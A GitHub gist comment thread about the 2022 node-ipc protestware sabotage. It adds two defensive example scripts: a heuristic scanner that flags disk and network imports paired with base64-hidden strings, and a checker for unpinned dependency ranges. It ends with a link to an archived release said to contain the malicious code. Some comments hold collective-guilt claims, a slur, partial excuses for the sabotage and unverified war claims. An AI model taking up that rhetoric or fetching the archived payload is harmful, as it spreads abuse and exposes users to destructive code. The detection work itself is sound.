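An added example of the kind of static check described above (this is illustrative code written for this page, not code from the gist, from node-ipc or from any npm tooling). It scans a package's published JavaScript, the files that actually land in node_modules rather than the repository, for two signals: imports of filesystem and network core modules, and string constants hidden behind Buffer.from(..., "base64"), which it decodes so a reviewer can see what was hidden. Either signal on its own is common in honest code; the combination in a library that has no business touching disk or network is what gets flagged. The sample inputs are constructed: the first mimics the shape of the obfuscated file (one-line ESM, disk plus network imports, base64 constants) without any of its payload, and the second is ordinary config-reading code that uses fs legitimately.

```javascript
// Added example, not code from the gist or from node-ipc: a heuristic scanner
// for "imports fs/https and hides its strings in base64". Run with node.

// Core modules whose presence in a library that should not need disk or
// network access is worth a second look.
const DISK_MODULES = new Set(["fs", "fs/promises", "child_process"]);
const NET_MODULES = new Set(["http", "https", "net", "dns"]);

// Matches `import x from "m"`, `import "m"`, `import("m")` and `require("m")`.
const IMPORT_RE = /\bimport\b[^;'"]*?["']([^"']+)["']|\brequire\(\s*["']([^"']+)["']\s*\)/g;
// Matches Buffer.from("<base64 literal>", "base64").
const B64_RE = /Buffer\.from\(\s*["']([A-Za-z0-9+/=]+)["']\s*,\s*["']base64["']\s*\)/g;

// Scan one source file and report what it imports and what its base64
// literals decode to. The "node:" prefix is stripped so node:fs counts as fs.
function scanSource(file, source) {
  const imports = new Set();
  for (const m of source.matchAll(IMPORT_RE)) {
    const mod = (m[1] || m[2]).replace(/^node:/, "");
    if (DISK_MODULES.has(mod) || NET_MODULES.has(mod)) imports.add(mod);
  }
  // Decode the literals so a reviewer sees the hidden strings in clear text.
  const decodedLiterals = [];
  for (const m of source.matchAll(B64_RE)) {
    decodedLiterals.push(Buffer.from(m[1], "base64").toString("utf8"));
  }
  const touchesDisk = [...imports].some((m) => DISK_MODULES.has(m));
  const touchesNet = [...imports].some((m) => NET_MODULES.has(m));
  return {
    file,
    imports: [...imports].sort(),
    decodedLiterals,
    // Only the combination is flagged; fs alone (a config reader) is not.
    suspicious: touchesDisk && touchesNet && decodedLiterals.length > 0,
  };
}

// Scan every file of a package (path -> source text) and return the hits.
function scanPackage(files) {
  return Object.entries(files)
    .map(([file, src]) => scanSource(file, src))
    .filter((r) => r.suspicious);
}

// Constructed sample inputs (not real package contents). The first mimics the
// shape of the obfuscated file without its payload; "aGVsbG8=" is just "hello".
const SAMPLE_FILES = {
  "dao/ssl-geospec.js":
    'import u from"path";import a from"fs";import o from"https";' +
    'const n=Buffer.from("aGVsbG8=","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");' +
    "export const ssl=true;",
  "lib/config.js":
    'const fs = require("node:fs");' +
    'module.exports = () => JSON.parse(fs.readFileSync("config.json", "utf8"));',
};

for (const hit of scanPackage(SAMPLE_FILES)) {
  console.log(`${hit.file}: imports ${hit.imports.join(", ")}; decoded ${JSON.stringify(hit.decodedLiterals)}`);
}
```

To use it against a real install, read each .js file under node_modules/<package> into the `files` map and look at the flagged entries by hand; a regex scan like this is a triage aid that narrows what a human reviews, not a verdict, and it will miss code that builds its strings some other way.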

@mocsy

mocsy commented Mar 19, 2022

Thanks @noblehng. Also note that Deno fixed this too, exactly because it's a long standing issue with node. "Secure by default. No file, network, or environment access, unless explicitly enabled."

Sometimes "Security by a million eyes" doesn't work. The entire OSS security model depends on reviews. If those don't happen the model is broken. Maybe that's where we need to improve.

@noblehng

Sometimes "Security by a million eyes" doesn't work. The entire OSS security model depends on reviews. If those don't happen the model is broken. Maybe that's where we need to improve.

The easiest way is like Russ Cox suggested, don't automatically use the latest version of all dependencies. Then if it is not in your direct dependencies, you could expect someone else to test the new version in a sandbox before updating this dependency, so you are not affected. Or fewer people are affected, at least. But this method probably couldn't prevent targeted attacks like this one.

Then there is the static analysis and other automatic testing that can be done by the package manager hub before publishing, like those app stores.

The best way would be to have a dedicated security team to audit updates for core/popular packages before publishing, but that would need the industry to fund it.
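An added example for the point made here and in AlttiRi's earlier remark about caret ranges (illustrative code written for this page, not code from the gist or from npm): it classifies the dependency ranges in a package.json so floating ranges stand out, and for each ^ or ~ range it computes the exclusive upper bound the range permits under npm's semver rules. That bound is the practical meaning of "automatically use the latest version": an install without a lockfile will accept any release below it, including a patch release the project never chose. The manifest is constructed; the package names and versions in it are illustrative.

```javascript
// Added example, not code from the gist or from npm: report dependencies in a
// package.json that are not pinned to an exact version, with the highest
// version each floating range would accept. Run with node.

// Exclusive upper bound that a caret range allows, per npm's semver rules:
// ^1.2.3 -> <2.0.0, ^0.2.3 -> <0.3.0, ^0.0.3 -> <0.0.4.
function caretUpperBound(major, minor, patch) {
  if (major > 0) return `${major + 1}.0.0`;
  if (minor > 0) return `0.${minor + 1}.0`;
  return `0.0.${patch + 1}`;
}

// Describe one range string. Only exact versions and simple ^/~ ranges on a
// full x.y.z version are interpreted; "*", "latest" and "" are "unbounded",
// and anything else (>=, ||, partial versions) is "other" so a reviewer looks.
function describeRange(range) {
  const r = String(range).trim();
  if (r === "" || r === "*" || r === "latest") return { kind: "unbounded", upperBound: null };
  const m = /^([\^~]?)(\d+)\.(\d+)\.(\d+)$/.exec(r);
  if (!m) return { kind: "other", upperBound: null };
  const op = m[1];
  const major = Number(m[2]), minor = Number(m[3]), patch = Number(m[4]);
  if (op === "") return { kind: "exact", upperBound: null };
  // ~1.2.3 accepts patch releases only: <1.3.0.
  if (op === "~") return { kind: "floating", upperBound: `${major}.${minor + 1}.0` };
  return { kind: "floating", upperBound: caretUpperBound(major, minor, patch) };
}

// Walk every dependency field and return the entries that are not pinned.
function findFloatingDependencies(pkg) {
  const fields = ["dependencies", "devDependencies", "optionalDependencies"];
  const out = [];
  for (const field of fields) {
    for (const [name, range] of Object.entries(pkg[field] || {})) {
      const info = describeRange(range);
      if (info.kind !== "exact") out.push({ field, name, range, ...info });
    }
  }
  return out;
}

// Constructed sample manifest; names and versions are illustrative only.
const SAMPLE_PACKAGE_JSON = {
  name: "example-app",
  dependencies: { "node-ipc": "^10.1.0", "left-pad": "~1.3.0", lodash: "4.17.21", debug: "*" },
  devDependencies: { eslint: ">=8.0.0" },
};

for (const d of findFloatingDependencies(SAMPLE_PACKAGE_JSON)) {
  const accepts = d.upperBound ? `accepts anything below ${d.upperBound}` : d.kind;
  console.log(`${d.field}: ${d.name}@${d.range} -> ${accepts}`);
}
```

This only covers direct dependencies; transitive ones are pinned by the lockfile, so the companion habit is committing package-lock.json and installing with `npm ci`, which installs exactly the locked tree and fails instead of silently resolving a newer release. Bumping a pinned version then becomes a deliberate, reviewable change rather than a side effect of the next install.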

@mgag

mgag commented Mar 20, 2022

@RIAEvangelist is a hero!
Cause there's no such thing as 'an ordinary people' there, in Russia. They are all responsible for the atrocious war crimes of Putin, as the Germans were responsible for the crimes of Hitler!

@ShikiSuen

@bxb100

bxb100 commented Mar 20, 2022

The wrong thing done for the "right" reason is still the wrong thing

@mgag

mgag commented Mar 20, 2022

@mgag Let's see which country more resembles Nazi Germany: https://www.opindia.com/2022/03/ukrainian-tv-show-host-fakhruddin-sharafmal-calls-for-genocide-of-russians-including-children/

Enough ruZZian pseudo-historical 'propaganda' here! I'm living just now. Under russian bombs.

@Uzlopak

Uzlopak commented Mar 20, 2022

Please keep politics out. Unfortunately the Ukrainians are too whiny and demanding too much. If we encourage this kind of behavior we can directly go to cyberwar with Russia. So cut the bullshit.

@Phsnomy

Phsnomy commented Mar 20, 2022

Please keep politics out. Unfortunately the Ukrainians are too whiny and demanding too much. If we encourage this kind of behavior we can directly go to cyberwar with Russia. So cut the bullshit.

Agreed, just cut this bullshit and prevent this kind of protestware bullshit from happening again. Otherwise open source projects' credibility will be severely damaged.


ghost commented Mar 21, 2022

OSS won't be damaged. Only node/javascript related OSS will be damaged

@ner00

ner00 commented Mar 21, 2022

OSS won't be damaged. Only node/javascript related OSS will be damaged

Yes it will. Sabotage from OSS is the headline, node/javascript is a footnote.


ghost commented Mar 21, 2022

@ner00 It is irrelevant what uninvolved people think. Kind of like how windows people think linux = ubuntu and that ubuntu doing something dumb means bad things for the "linux community"
It won't.

@forresthopkinsa

@ner00

ner00 commented Mar 21, 2022

Yeah, well, the illusion that only the perception of 1337 coders matters on the subject is naive. A relatively small and isolated incident like this still sends a very strong message, and not in a good way. I'm aware that I'm being a bit overdramatic here, but the point still stands.


ghost commented Mar 21, 2022

@forresthopkinsa can't read it, it's paid so opinion discarded
@ner00 It literally won't change a thing. OSS is used in so many places that replacing it is virtually impossible. I am really tired of arguing with you people. Go ahead and stop using any OSS project if you want. Might as well not program at all since pretty much every programming language I know of is OSS. But I guess I am too 1337 to get your 180 IQ take.


ghost commented Mar 21, 2022

How about we stop using linux and FreeBSD altogether because some javascript idiot uploaded malware to npm. Absolute retard take.

@ner00

ner00 commented Mar 22, 2022

I am really tired of arguing with you people.

I'm sorry, wasn't aware given how involved you seem. You did understand the dig I made at your arrogance, which is good.


ghost commented Mar 22, 2022

You are absolutely right about me being more involved than I should.

@krisavi

krisavi commented Mar 22, 2022

@MidSpike has put together quite a good overview of the problem.
As @noblehng brought up, the package manager probably should do some more checks on popular packages, but that means there has to be some financing to be able to make the review system happen there. This is not only an NPM and JS problem. Probably if a package crosses some critical mass of usage then it should start to go through a review system before being published in package managers. I would say that even Log4j could have used something like that, where this "code safety" organization tries to find vulnerabilities or malicious pieces of code before it gets shipped to those who haven't done proper dependency locking.

I understand @RIAEvangelist's point partly as well, and this dependency is the biggest platform he had available to use to express his opinion. Creating a file on the desktop would have been just an annoyance and I guess the backlash wouldn't have been as big. Deleting files was pretty bad; I wouldn't have done that, but for really showing your dislike the easiest and a lot less harmful way would have been to just check if the IP is in country x and then put in a log message and not run functions of that dependency. That would still have been annoying, but not as destructive as deleting files.

It is and will be a problem in OSS. Supply-chain poisoning will be a problem if there is some conflict in the author's interests, and we all have our own opinions. Currently the only way for you not to be affected by them would be to not use 3rd party dependencies or lock versions to known and safe packages. The first one would mean a lot of reinventing the wheel for companies and slowing innovation. The second one is what developers should do, and bump versions only after they are verified. It also could slow down development a bit, but not as much.

From Brandon's repo comments I am really disappointed in IQ of dev community.

  • The harassment of his employee, Swatting, etc. is not ok still. If you have proof that the code change he did caused harm, then gather it and sue him.
  • Distribution of this package and "Malware" in my eyes lies on NPM and software that has it as dependency. Technically he did not push the package to you, but you pulled from package manager.
  • Talking about children's hospital now suddenly not working and respirators not working... Huh? Why would they use node in respirator system or in any life-critical system at all.
  • The claim about some American NGO losing all its files seems fake to me, just to blow things out of proportion. For that to happen that NGO has to make so many mistakes to make it possible to lose all the data in 1 go, like lack of backups and developing and building code with no review or test process in production servers. In order for a malicious package to get to production servers there should be some kind of development process that involves a test period. If either one of those is missing or broken, then it is not the package that is at fault, but the business process first. Yes, the package should not contain such code, but to blame the repo maintainer for a series of issues in an organization where the package author has no say in changing seems wrong.
  • Personal insults, calling names is something that was done in elementary school and is seen as a sign of immaturity rather than intelligence. Intelligent people insult in more subtle ways. So show you are smart and mature. I personally thought software developers were supposed to be smart people, but for now some rotten apples have broken that illusion.
  • There were some comments about journalists and different other profession people being affected... I do not see quite how, the most likely for you to be affected is when you had Unity Hub installed or doing software development. Unity Hub issue is them not doing proper dependency management. I do not see how this package would have gotten to all those journalists computers, are they part-time JS developers?

Whoever thinks the ordinary Russian citizen is innocent and should not suffer because of their leader, then think, why does the ordinary Ukrainian have to suffer because of the leader of some other country. The ordinary Russian is in that case less innocent than the ordinary Ukrainian.

@ShikiSuen one journalist shows how the people of a whole nation are? He seems like one rotten apple ruining the bunch. His name is not Ukrainian, from the looks I doubt he is part of Ukrainian culture or should be listened to as a representative of the whole nation. The Ukrainian president is chosen to be the "face" of the whole nation and I have not heard him calling for genocide. From what I have seen he asks for Russian troops to go back to Russia to save their lives because Ukrainians will protect themselves in Ukraine. There is a difference between protecting your own country and attacking another one. In the current case the Russian army is the one who has bombed and killed Ukrainian people, including children, while the children of Russia are safe in Russia.

@ShikiSuen

ShikiSuen commented Mar 23, 2022

@krisavi The massacre in the East Ukraine started years ago prior to Russian invasion.
I'm not about to blame Zelensky for that since Zelensky doesn't have enough control to what happened there.
The Azov Battalion is the one to blame.

What I can hope is that the Azov Battalion gets evaporated as early as possible so Russian troops can be pulled out of Ukraine earlier.
The war itself is a disaster, still.



ghost commented Mar 23, 2022

@krisavi It won't affect OSS. This is strictly a JS/NPM problem. I am unsure why you people think this, maybe you could elaborate.
In general, the issue is with package managers of any sort. We have traded convenience for security.


ghost commented Mar 23, 2022

On a side note, if this malware wasn't OSS, it would very likely be deleting files to this day. So even though it is malware, because it's open source, people could identify the issue faster. Just imagine this package to be closed-source proprietary software. The damage would be continuing, and we wouldn't be here discussing it.

@Uzlopak

Uzlopak commented Mar 23, 2022

@krisavi

How do you test for Russian IP in the EU or USA? Do you test your code for every region in the world?

@Zei33

Zei33 commented Apr 12, 2022

Package managers are built on a certain level of trust. It's unethical and sets a dangerous precedent in the developer community to convert your package into malware. If you want to make a statement, put a big disclaimer in the README. You can send a message without putting everyone at risk.

This could easily go wrong and affect people outside of the targets. Not every developer works for a big corporation with measures in place to deal with this kind of disaster. You could easily be wiping out months of work for a little mom-and-pop business in New Zealand, innocent people that don't know any better.

Now every popular package developer that has a statement to make will be thinking about this kind of tactic. It's the same with faker.js and unfortunately, any developer that does this will be damaged goods for the rest of their career.

@xsrvmy

xsrvmy commented Apr 23, 2022

On the topic of making statements, there was an incident over two years ago as well where packages started displaying ads when installed, which NPM soon declared to be disallowed.

For me personally though, the most unsettling thing about this attack is that node-ipc is actually run on personal computers by hobbyist vue users, and it might have been able to delete synced OneDrive, Dropbox, etc. files.

@Disquse

Disquse commented Apr 23, 2022

Given how many idiotic conspiracy theorists are here, Russian propaganda works well even outside of Russia. This is really sad for me as a Russian, that even outside of this information prison people manage to fall for the most obvious lies.

@GoombaProgrammer

welcome to earth

@samuelmattjohnston

samuelmattjohnston commented Feb 5, 2024

The guy purged his github repo and republished it with help from github to kill all the old hashes..
RIAEvangelist/node-ipc#3
The versions live on npm and can still deliver malware, as the issue states.

My archive is still live for posterity reasons. Here is the release of the code he pushed:
https://github.com/samuelmattjohnston/node-ipc/releases/tag/v10.1.3
samuelmattjohnston/node-ipc@847047c
